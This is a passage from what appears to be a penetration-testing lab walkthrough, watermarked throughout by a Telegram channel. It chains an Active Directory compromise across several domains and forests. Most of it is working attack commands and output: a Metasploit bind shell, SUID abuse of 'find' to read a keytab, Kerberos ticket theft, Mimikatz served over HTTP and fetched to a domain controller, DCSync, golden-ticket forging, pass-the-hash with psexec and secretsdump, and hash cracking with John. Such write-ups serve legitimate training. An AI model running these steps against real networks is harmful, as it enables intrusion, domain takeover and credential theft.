𝑠𝑒𝑡 𝑃𝐴𝑆𝑆𝑊𝑂𝑅𝐷 𝐴𝑑𝑚!𝑛@𝐽3𝑛𝑘!𝑛𝑠

Configure Payload:
𝑠𝑒𝑡 𝑝𝑎𝑦𝑙𝑜𝑎𝑑 𝑙𝑖𝑛𝑢𝑥/𝑥86/𝑠ℎ𝑒𝑙𝑙_𝑏𝑖𝑛𝑑_𝑡𝑐𝑝
𝑠𝑒𝑡 𝑟ℎ𝑜𝑠𝑡 10.10.2.4
𝑠𝑒𝑡 𝑣𝑒𝑟𝑏𝑜𝑠𝑒 𝑡𝑟𝑢𝑒
run

Executing the module results in a bind shell on

"OPS-SRV" server.

Interestingly, this machine is domain joined

which can be confirmed through the presence of a
'/etc/krb5.conf' file or successful execution of
the command "kinit -k host/$(hostname -f)".

With access to the "OPS-SRV" machine we will look

for any credentials/tickets that can move us
forward. After enumeration, a keytab file is
located at "/var/lib/jenkins/support.keytab".

But there is a problem... We do not have access

to the keytab file because it is owned by another

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

user 'opsadmin'. We need to somehow become

opsadmin or get his privileges.

Hopefully, during some priv-esc enumeration, a

file named "find" was found located at
"/var/lib/jenkins/find" which has SUID bit set.

Check if OPS-SRV is domain joined or not:

𝑘𝑖𝑛𝑖𝑡 −𝑘 ℎ𝑜𝑠𝑡/$(ℎ𝑜𝑠𝑡𝑛𝑎𝑚𝑒 −𝑓)

Keytab file found at:

/𝑣𝑎𝑟/𝑙𝑖𝑏/𝑗𝑒𝑛𝑘𝑖𝑛𝑠/𝑠𝑢𝑝𝑝𝑜𝑟𝑡.𝑘𝑒𝑦𝑡𝑎𝑏

Get opsadmin privileges, SUID check:

𝑓𝑖𝑛𝑑 / −𝑝𝑒𝑟𝑚 −𝑢=𝑠 −𝑡𝑦𝑝𝑒 𝑓 2>/𝑑𝑒𝑣/𝑛𝑢𝑙𝑙
<Result> /𝒗𝒂𝒓/𝒍𝒊𝒃/𝒋𝒆𝒏𝒌𝒊𝒏𝒔/𝒇𝒊𝒏𝒅 </Result>

Using the file 'find', we will change the

permissions of 'support.keytab' file and request
a new ticket.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Escalate to "opsadmin" user and request a new TGT

for support user, as follows.

Escalation to "opsadmin" user:

/𝑣𝑎𝑟/𝑙𝑖𝑏/𝑗𝑒𝑛𝑘𝑖𝑛𝑠/𝑓𝑖𝑛𝑑 𝑎𝑏 −𝑒𝑥𝑒𝑐 𝑐ℎ𝑚𝑜𝑑 777 𝑠𝑢𝑝𝑝𝑜𝑟𝑡.𝑘𝑒𝑦𝑡𝑎𝑏 \;

Check the permissions of “support.keytab” file:

𝑙𝑠 −𝑙𝑎 /𝑣𝑎𝑟/𝑙𝑖𝑏/𝑗𝑒𝑛𝑘𝑖𝑛𝑠/𝑠𝑢𝑝𝑝𝑜𝑟𝑡.𝑘𝑒𝑦𝑡𝑎𝑏

Request for TGT of support user:

𝑘𝑖𝑛𝑖𝑡 −𝑘 −𝑡 𝑠𝑢𝑝𝑝𝑜𝑟𝑡.𝑘𝑒𝑦𝑡𝑎𝑏 𝑠𝑢𝑝𝑝𝑜𝑟𝑡

Permissions of "support.keytab" file is changed.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Now, with enough permissions a TGT related to the

"support" domain user can be easily obtained. Let
us now request a CIFS ticket for the "support"
user, as follows.

To request a CIFS ticket, use the following and

export it back to your attacking machine.

Request for CIFS Ticket for support user (On

OPS-SRV machine):
𝑘𝑣𝑛𝑜 𝑐𝑖𝑓𝑠/\𝐸𝐿𝑆−𝐶𝐻𝐼𝐿𝐷𝐷𝐶

Convert ticket into base64 (On OPS-SRV machine):

𝑏𝑎𝑠𝑒64 /𝑡𝑚𝑝/𝑘𝑟𝑏5𝑐𝑐_123

Copy base64 data and decode in attacker system

(On Attacker Machine):
𝑏𝑎𝑠𝑒64 −𝑑 𝑘𝑟𝑏5𝑐𝑐_123_b64 > /𝑡𝑚𝑝/𝑘𝑟𝑏5𝑐𝑐_123

Set Environment variable on attacker machine:

𝑒𝑥𝑝𝑜𝑟𝑡 𝐾𝑅𝐵5𝐶𝐶𝑁𝐴𝑀𝐸=/𝑡𝑚𝑝/𝑘𝑟𝑏5𝑐𝑐_123

Transferring the ticket using the base64 method

and importing it to current environment variable.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

1. CHILD-DC Server

Since we have successfully imported a CIFS ticket

related to ELS-CHILDDC in our attacking machine,
we can connect to the "ELS-CHILDDC" Domain
Controller using the ticket. Also, our
meterpreter has a route to the "10.10.2.0/24"
network.

For that we will use impacket's psexec script,

but first we need to add the IP address of
ELS-CHILDDC in our hosts file.

Open /etc/hosts file:

10.10.2.2 𝐸𝐿𝑆−𝐶𝐻𝐼𝐿𝐷𝐷𝐶

Using Impacket’s psexec module, connect to

ELS-CHILDDC
𝑝𝑟𝑜𝑥𝑦𝑐ℎ𝑎𝑖𝑛𝑠 𝑝𝑦𝑡ℎ𝑜𝑛 𝑝𝑠𝑒𝑥𝑒𝑐. 𝑝𝑦 −𝑘 −𝑛𝑜−𝑝𝑎𝑠𝑠 −𝑑𝑒𝑏𝑢𝑔 −𝑑𝑐−𝑖𝑝
10.10.2.2 𝑠𝑢𝑝𝑝𝑜𝑟𝑡@𝐸𝐿𝑆−𝐶𝐻𝐼𝐿𝐷𝐷𝐶

NOTE: ‘-k’ option to use the active Kerberos

ticket

In short, we are passing the CIFS ticket to the

ELS-CHILDDC server from our attacking machine.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

This will result in a successful and stable

session on the 'ELS-CHILDDC' Domain Controller.

We will also use the "PROD-SRV" server to

transfer payload from one end to another. Via the
meterpreter session on the 'PROD-SRV' server

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

upload "Mimikatz.exe" and from that download the

file to "ELS-CHILDDC" server.

On PROD-SRV meterpreter session, upload

Mimikatz.exe:
𝑢𝑝𝑙𝑜𝑎𝑑 𝑚𝑖𝑚𝑖𝑘𝑎𝑡𝑧.𝑒𝑥𝑒 /𝑡𝑚𝑝/𝑚𝑖𝑚𝑖𝑘𝑎𝑡𝑧.𝑒𝑥𝑒

Start web server to host payload on PROD-SRV

server
𝑠ℎ𝑒𝑙𝑙
𝑐𝑑 /𝑡𝑚𝑝/
𝑙𝑠 −𝑙𝑎 𝑚𝑖𝑚𝑖𝑘𝑎𝑡𝑧.𝑒𝑥𝑒
𝑝𝑦𝑡ℎ𝑜𝑛 −𝑚 𝑆𝑖𝑚𝑝𝑙𝑒𝐻𝑇𝑇𝑃𝑆𝑒𝑟𝑣𝑒𝑟 8888

With Active psexec session on ELS-CHILDDC,

download the payload:
𝑝𝑜𝑤𝑒𝑟𝑠ℎ𝑒𝑙𝑙.𝑒𝑥𝑒 𝐼𝑛𝑣𝑜𝑘𝑒−𝑊𝑒𝑏𝑅𝑒𝑞𝑢𝑒𝑠𝑡 −𝑈𝑅𝐼
ℎ𝑡𝑡𝑝://172.16.250.2:8888/𝑚𝑖𝑚𝑖𝑘𝑎𝑡𝑧.𝑒𝑥𝑒 −𝑂𝑢𝑡𝐹𝑖𝑙𝑒
𝐶:\𝑈𝑠𝑒𝑟𝑠\𝑃𝑢𝑏𝑙𝑖𝑐\𝑚𝑖𝑚𝑖𝑘𝑎𝑡.𝑒𝑥𝑒

Upload Mimikatz.exe:

Start Python server on "PROD-SRV" server: -

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Downloading, Mimikatz.exe on "ELS-CHILDDC" Domain

Controller.

Our payload is successfully transferred to Child

Domain Controller. Now let us forge a golden
ticket to escalate to Enterprise Admins of the
parent domain.

However, we will need, the following:

● Krbtgt hash of child DC

● Child Domin SID

● Parent Domain SID

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

● Current Domain FQDN

To extract the krbtgt NTLM hash of the

"els-childdc" domain, we will perform a DCSync
attack.

𝑚𝑖𝑚𝑖𝑘𝑎𝑡𝑧.𝑒𝑥𝑒
𝑙𝑠𝑎𝑑𝑢𝑚𝑝::𝑑𝑐𝑠𝑦𝑛𝑐 /𝑢𝑠𝑒𝑟:𝑒𝑙𝑠−𝑐ℎ𝑖𝑙𝑑\𝑘𝑟𝑏𝑡𝑔𝑡

<Result>
𝟐𝟎𝟏𝟕𝒇𝟑𝟖𝒇𝟖𝟗𝟕𝒃𝟏𝟒𝟑𝟖𝒆𝟒𝟗𝟑𝒆𝟐𝒆𝒆𝟓𝟖𝒅𝒃𝟗𝟖𝒄𝟎
</Result>

See below the extracted NTLM Hash of 'krbtgt'

from the child domain controller. The SID of the
child domain can be extracted from the result
(without RID part).

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

To enumerate the parent SID value, we can use the

Active Directory module already present at the
domain controller.

In the psexec session, switch to Power Shell:

𝑝𝑜𝑤𝑒𝑟𝑠ℎ𝑒𝑙𝑙
𝐼𝑚𝑝𝑜𝑟𝑡−𝑀𝑜𝑑𝑢𝑙𝑒 𝐴𝑐𝑡𝑖𝑣𝑒𝐷𝑖𝑟𝑒𝑐𝑡𝑜𝑟𝑦

Enumerate Domains present in the Forest (most

importantly SID value of parent domain):
𝐺𝑒𝑡−𝐴𝐷𝐷𝑜𝑚𝑎𝑖𝑛
𝐺𝑒𝑡−𝐴𝐷𝐹𝑜𝑟𝑒𝑠𝑡
𝐺𝑒𝑡−𝐴𝐷𝐷𝑜𝑚𝑎𝑖𝑛 𝑒𝑙𝑠.𝑐𝑜𝑟𝑝 (𝑓𝑜𝑟 𝑠𝑖𝑑 𝑜𝑓 𝑒𝑙𝑠.𝑐𝑜𝑟𝑝)

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

SID of Parent Domain Controller [els.corp]

discovered:

We have collected all the info needed to perform

a golden ticket attack and cross the domain
boundary. Let's use Mimikatz.exe functionality to
create and pass a golden ticket.

Create & Pass Golden Ticket:

𝑘𝑒𝑟𝑏𝑒𝑟𝑜𝑠::𝑔𝑜𝑙𝑑𝑒𝑛 /𝑢𝑠𝑒𝑟:𝑒𝑙𝑠−𝑎𝑑𝑚𝑖𝑛 /𝑑𝑜𝑚𝑎𝑖𝑛:𝑒𝑙𝑠−𝑐ℎ𝑖𝑙𝑑.𝑒𝑙𝑠.𝑐𝑜𝑟𝑝
/𝑠𝑖𝑑:𝑆−1−5−21−3883140795−789752816−1587902789
/𝑘𝑟𝑏𝑡𝑔𝑡:𝟐𝟎𝟏𝟕𝒇𝟑𝟖𝒇𝟖𝟗𝟕𝒃𝟏𝟒𝟑𝟖𝒆𝟒𝟗𝟑𝒆𝟐𝒆𝒆𝟓𝟖𝒅𝒃𝟗𝟖𝒄𝟎
/𝑠𝑖𝑑𝑠:𝑆−1−5−21−286056459−1157968049−2884264478−519
/𝑡𝑖𝑐𝑘𝑒𝑡:𝑡𝑖𝑐𝑘𝑒𝑡.𝑘𝑖𝑟𝑏𝑖

𝑘𝑒𝑟𝑏𝑒𝑟𝑜𝑠::𝑝𝑡𝑡 𝑡𝑖𝑐𝑘𝑒𝑡.𝑘𝑖𝑟𝑏𝑖

Golden Ticket:

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Passing the ticket in active Kerberos session:

To check if the ticket is successfully passed or

not, one can always use the 'klist' command. Now,
we can access resources of the parent domain and
request any service ticket.

We will also extract the NTLM hash of the

Enterprise Administrator of "els.corp" domain
(found previously during enumeration activities)
using mimikatz.exe

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

1. ELS-DC Server

With the credentials of "els-admin" enterprise

admin, we can perform psexec on the parent DC
server.

Perform psexec on ELS-DC server:

𝑝𝑟𝑜𝑥𝑦𝑐ℎ𝑎𝑖𝑛𝑠 𝑝𝑦𝑡ℎ𝑜𝑛 𝑝𝑠𝑒𝑥𝑒𝑐.𝑝𝑦 −𝑑𝑒𝑏𝑢𝑔 −𝑑𝑐−𝑖𝑝 10.10.1.3
𝑒𝑙𝑠−𝑎𝑑𝑚𝑖𝑛@𝐸𝐿𝑆−𝐷𝐶 −ℎ𝑎𝑠ℎ𝑒𝑠
𝑎𝑎𝑑3𝑏435𝑏51404𝑒𝑒𝑎𝑎𝑑3𝑏435𝑏51404𝑒𝑒:8645𝑒87𝑒2593507𝑐𝑓623
𝑓3291𝑏1334𝑐2

"NT Authority\System" at "ELS-DC" parent domain

controller.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Let's now use the Active-Directory module to

perform some enumeration (for abusing a
cross-forest trust later on). Switch to
PowerShell and load the AD module to enumerate a
forest trust.

Load AD module & perform trust enumeration

𝐼𝑚𝑝𝑜𝑟𝑡−𝑀𝑜𝑑𝑢𝑙𝑒 𝐴𝑐𝑡𝑖𝑣𝑒𝐷𝑖𝑟𝑒𝑐𝑡𝑜𝑟𝑦
𝐺𝑒𝑡−𝐴𝐷𝑇𝑟𝑢𝑠𝑡 −𝐹𝑖𝑙𝑡𝑒𝑟 ∗

Output of trust established by the "els.corp"

domain.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Another domain "mgmt.corp" having a

bi-directional trust has been identified in the
above result. A Foreign Security Principal can
indirectly be used to abuse the cross-forest
trust. Let's enumerate FSP's available on the
identified domain "mgmt.corp".

Enumerate FSPs on mgmt.corp domain

𝐺𝑒𝑡−𝐴𝐷𝑂𝑏𝑗𝑒𝑐𝑡 −𝐹𝑖𝑙𝑡𝑒𝑟 {𝑜𝑏𝑗𝑒𝑐𝑡𝐶𝑙𝑎𝑠𝑠 −𝑒𝑞
"𝑓𝑜𝑟𝑒𝑖𝑔𝑛𝑆𝑒𝑐𝑢𝑟𝑖𝑡𝑦𝑃𝑟𝑖𝑛𝑐𝑖𝑝𝑎𝑙"} −𝑠𝑒𝑟𝑣𝑒𝑟 𝑚𝑔𝑚𝑡.𝑐𝑜𝑟𝑝

A Foreign Security Principal is available on the

"mgmt.corp" domain, this means a user in the

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

current domain "els.corp" is present in the

target "mgmt.corp" domain:

Convert the identified user to SID:

Identify User:
𝐺𝑒𝑡−𝐴𝐷𝑈𝑠𝑒𝑟 −𝐹𝑖𝑙𝑡𝑒𝑟 ∗ |?{$_.𝑆𝐼𝐷 −𝑒𝑞
′𝑆−1−5−21−286056459−1157968049−2884264478−1107′}

The foreign user can be identified as

"forest_user" of the els.corp domain:

We need to identify the privileges of

"forest_user" in the mgmt.corp domain.

Identify on which group ‘forest_user’ is added at

mgmt.corp domain:
𝐺𝑒𝑡−𝐴𝐷𝐺𝑟𝑜𝑢𝑝 −𝐹𝑖𝑙𝑡𝑒𝑟 ∗ −𝑃𝑟𝑜𝑝𝑒𝑟𝑡𝑖𝑒𝑠 𝑀𝑒𝑚𝑏𝑒𝑟 −𝑠𝑒𝑟𝑣𝑒𝑟 𝑚𝑔𝑚𝑡.𝑐𝑜𝑟𝑝
|?{$_.𝑀𝑒𝑚𝑏𝑒𝑟 −𝑚𝑎𝑡𝑐ℎ
′𝑆−1−5−21−3658202825−2428483480−107650130−1107′}

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

It comes out that 'forest_user' is added to local

administrators of the 'mgmt.corp' domain.

Now, we need to extract the credentials of

'forest_user' and then we will perform PTH to the
"mgmt.corp" domain.

Run secretsdump against mgmt.corp domain:

𝑝𝑟𝑜𝑥𝑦𝑐ℎ𝑎𝑖𝑛𝑠 𝑝𝑦𝑡ℎ𝑜𝑛 𝑠𝑒𝑐𝑟𝑒𝑡𝑠𝑑𝑢𝑚𝑝.𝑝𝑦 −𝑑𝑒𝑏𝑢𝑔 −𝑑𝑐−𝑖𝑝 10.10.1.3
𝑒𝑙𝑠−𝑎𝑑𝑚𝑖𝑛@𝐸𝐿𝑆−𝐷𝐶 −ℎ𝑎𝑠ℎ𝑒𝑠
𝑎𝑎𝑑3𝑏435𝑏51404𝑒𝑒𝑎𝑎𝑑3𝑏435𝑏51404𝑒𝑒:8645𝑒87𝑒2593507𝑐𝑓623
𝑓3291𝑏1334𝑐2

<Result>
𝑒𝑙𝑠.𝑐𝑜𝑟𝑝\𝑓𝑜𝑟𝑒𝑠𝑡_𝑢𝑠𝑒𝑟:1107:𝑎𝑎𝑑3𝑏435𝑏51404𝑒𝑒𝑎𝑎𝑑3𝑏435𝑏51404𝑒
𝑒:𝑏7001𝑏2𝑑𝑏𝑒0𝑓𝑏𝑑𝑏𝑑62𝑒𝑒4𝑏3𝑏𝑑𝑒2410𝑏9
</Result>

Credentials of "forest_user" are extracted as

follows:

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

We will now perform psexec against the 'mgmt-DC'

server. The IP address of mgmt.corp domain can be
enumerated using a simple DNS query (i.e nslookup
mgmt.corp).

1. MGMT-DC Server

Using "forest_user" we can establish a persistent

connection using impacket's psexec script since
it is a member of local administrators in the
mgmt.corp domain.

Psexec as ‘forest_user’ on ‘mgmt.corp’ domain:

𝑝𝑟𝑜𝑥𝑦𝑐ℎ𝑎𝑖𝑛𝑠 𝑝𝑦𝑡ℎ𝑜𝑛 𝑝𝑠𝑒𝑥𝑒𝑐.𝑝𝑦 −𝑑𝑒𝑏𝑢𝑔 −𝑑𝑐−𝑖𝑝 10.10.3.2
𝑓𝑜𝑟𝑒𝑠𝑡_𝑢𝑠𝑒𝑟@𝑀𝐺𝑀𝑇−𝐷𝐶 −ℎ𝑎𝑠ℎ𝑒𝑠
𝑎𝑎𝑑3𝑏435𝑏51404𝑒𝑒𝑎𝑎𝑑3𝑏435𝑏51404𝑒𝑒:𝑏7001𝑏2𝑑𝑏𝑒0𝑓𝑏𝑑𝑏𝑑62𝑒𝑒4
𝑏3𝑏𝑑𝑒2410𝑏9

Switch to PowerShell

You will see something similar to the below.

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

We will also use the Active Directory Module

present in the server to list any OU present in
the MGMT-DC and all the members present in the
available OU's.

LIST all OU’s in MGMT.CORP

𝐼𝑚𝑝𝑜𝑟𝑡−𝑀𝑜𝑑𝑢𝑙𝑒 𝐴𝑐𝑡𝑖𝑣𝑒𝐷𝑖𝑟𝑒𝑐𝑡𝑜𝑟𝑦
𝐺𝑒𝑡−𝐴𝐷𝑂𝑏𝑗𝑒𝑐𝑡 −𝐹𝑖𝑙𝑡𝑒𝑟 {𝑂𝑏𝑗𝑒𝑐𝑡𝐶𝑙𝑎𝑠𝑠 −𝑒𝑞 ‘𝑜𝑟𝑔𝑎𝑛𝑖𝑧𝑎𝑡𝑖𝑜𝑛𝑎𝑙𝑢𝑛𝑖𝑡’}
−𝑃𝑟𝑜𝑝𝑒𝑟𝑡𝑖𝑒𝑠 𝐶𝑎𝑛𝑜𝑛𝑖𝑐𝑎𝑙𝑁𝑎𝑚𝑒 | 𝑆𝑒𝑙𝑒𝑐𝑡−𝑂𝑏𝑗𝑒𝑐𝑡 𝐷𝑖𝑠𝑡𝑖𝑛𝑔𝑢𝑖𝑠ℎ𝑒𝑑𝑁𝑎𝑚𝑒

Get Members of “Bastion-Host” OU

$𝑜𝑢𝑝𝑎𝑡ℎ = “𝑂𝑈=𝐵𝑎𝑠𝑡𝑖𝑜𝑛−𝐻𝑜𝑠𝑡,𝐷𝐶=𝑚𝑔𝑚𝑡,𝐷𝐶=𝑐𝑜𝑟𝑝”
𝐺𝑒𝑡−𝐴𝐷𝑈𝑠𝑒𝑟 −𝐹𝑖𝑙𝑡𝑒𝑟 ∗ −𝑆𝑒𝑎𝑟𝑐ℎ𝐵𝑎𝑠𝑒 $𝑜𝑢𝑝𝑎𝑡ℎ
(𝑗𝑢𝑚𝑝−𝑎𝑑𝑚𝑖𝑛 𝑢𝑠𝑒𝑟 𝑑𝑖𝑠𝑐𝑜𝑣𝑒𝑟𝑒𝑑 )

The Domain user "Jump-Admin" present in the

"Bastion-Host" OU can be useful in moving forward
from the MGMT-DC server. The IP address of
"jump-srv" server can be enumerated by actively
querying the DNS record.

𝑛𝑠𝑙𝑜𝑜𝑘𝑢𝑝 𝑗𝑢𝑚𝑝−𝑠𝑟𝑣

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

<..SNIP..>
Name: jump-srv.mgmt.corp
IP Address: 10.10.3.3
<../SNIP..>

However, we will extract all the credentials

present in the MGMT.CORP domain leveraging
impacket's sercretsdump.py script.

On a new bash prompt using our route to internal

network [10.10.3.0/24], we will execute
secretsdump.py as follows:

𝑝𝑟𝑜𝑥𝑦𝑐ℎ𝑎𝑖𝑛𝑠 𝑠𝑒𝑐𝑟𝑒𝑡𝑠𝑑𝑢𝑚𝑝. 𝑝𝑦 −𝑑𝑒𝑏𝑢𝑔 −𝑑𝑐−𝑖𝑝 10.10.3.2

𝑠𝑝𝑛_𝑠𝑣𝑐@𝑀𝐺𝑀𝑇−𝐷𝐶.𝑀𝐺𝑀𝑇.𝐶𝑂𝑅𝑃

[..SNIP..]
𝒎𝒈𝒎𝒕−𝒂𝒅𝒎𝒊𝒏:500:𝑎𝑎𝑑3𝑏435𝑏51404𝑒𝑒𝑎𝑎𝑑3𝑏435𝑏51404𝑒𝑒:86𝑐6
4𝑎256𝑒8𝑎𝑒𝑏2𝑒𝑑𝑓31𝑏4157𝑏𝑓6𝑏𝑒𝑐𝑏:::
𝒌𝒓𝒃𝒕𝒈𝒕:502:𝑎𝑎𝑑3𝑏435𝑏51404𝑒𝑒𝑎𝑎𝑑3𝑏435𝑏51404𝑒𝑒:2𝑎7𝑎0𝑓5379
83𝑏𝑎𝑐4120725𝑑055𝑓𝑐𝑏𝑏𝑎9:::
𝒎𝒈𝒎𝒕.𝒄𝒐𝒓𝒑\𝒋𝒖𝒎𝒑−𝒂𝒅𝒎𝒊𝒏:1104:𝑎𝑎𝑑3𝑏435𝑏51404𝑒𝑒𝑎𝑎𝑑3𝑏435𝑏51
404𝑒𝑒:𝟐𝒅𝒄𝟗𝒃𝒇𝒇𝟑𝟗𝟕𝒇𝟗𝒆𝟔𝒄𝟗𝒇𝟎𝟖𝒂𝟎𝟓𝒃𝟏𝟖𝟏𝟒𝟓𝒂𝟕𝒃𝟔:::
𝒎𝒈𝒎𝒕.𝒄𝒐𝒓𝒑\𝒔𝒑𝒏_𝒔𝒗𝒄:1106:𝑎𝑎𝑑3𝑏435𝑏51404𝑒𝑒𝑎𝑎𝑑3𝑏435𝑏51404𝑒
𝑒:2𝑑𝑐9𝑏𝑓𝑓397𝑓9𝑒6𝑐9𝑓08𝑎05𝑏18145𝑎7𝑏6:::
[..SNIP..]

Crack the "jump-admin" hash using JTR [John] by

storing the NT hash in a file.

→ Crack jump-admin
hash(2dc9bff397f9e6c9f08a05b18145a7b6):

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Copy the hash “2dc9bff397f9e6c9f08a05b18145a7b6”

in jump-adminpass.txt file

𝑗𝑜ℎ𝑛 −−𝑓𝑜𝑟𝑚𝑎𝑡=𝑁𝑇 𝑗𝑢𝑚𝑝−𝑎𝑑𝑚𝑖𝑛𝑝𝑎𝑠𝑠.𝑡𝑥𝑡

−𝑤=/𝑢𝑠𝑟/𝑠ℎ𝑎𝑟𝑒/𝑤𝑜𝑟𝑑𝑙𝑖𝑠𝑡𝑠/𝑟𝑜𝑐𝑘𝑦𝑜𝑢.𝑡𝑥𝑡

The hash is cracked and we now have clear text

credentials of the "jump-admin" user at the
"Jump-Admin" machine.

1. Jump-Srv

Let's perform a TCP port scan against the target

10.10.3.3 [jump-srv.mgmt.corp] using nmap and
leveraging the route to the 10.10.3.0/24 network.

With meterpreter active route to “10.10.3.0/24”

network & on new bash shell
𝑝𝑟𝑜𝑥𝑦𝑐ℎ𝑎𝑖𝑛𝑠 𝑛𝑚𝑎𝑝 −−𝑡𝑜𝑝−𝑝𝑜𝑟𝑡𝑠 10 −𝑠𝑇 −𝑠𝑉 −𝑃𝑛 10.10.3.3

<..SNIP..>
𝑁𝑚𝑎𝑝 𝑠𝑐𝑎𝑛 𝑟𝑒𝑝𝑜𝑟𝑡 𝑓𝑜𝑟 10.10.3.3
𝐻𝑜𝑠𝑡 𝑖𝑠 𝑢𝑝 (2.4𝑠 𝑙𝑎𝑡𝑒𝑛𝑐𝑦).
𝑃𝑂𝑅𝑇 𝑆𝑇𝐴𝑇𝐸 𝑆𝐸𝑅𝑉𝐼𝐶𝐸 𝑉𝐸𝑅𝑆𝐼𝑂𝑁
21/𝑡𝑐𝑝 𝑐𝑙𝑜𝑠𝑒𝑑 𝑓𝑡𝑝

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa

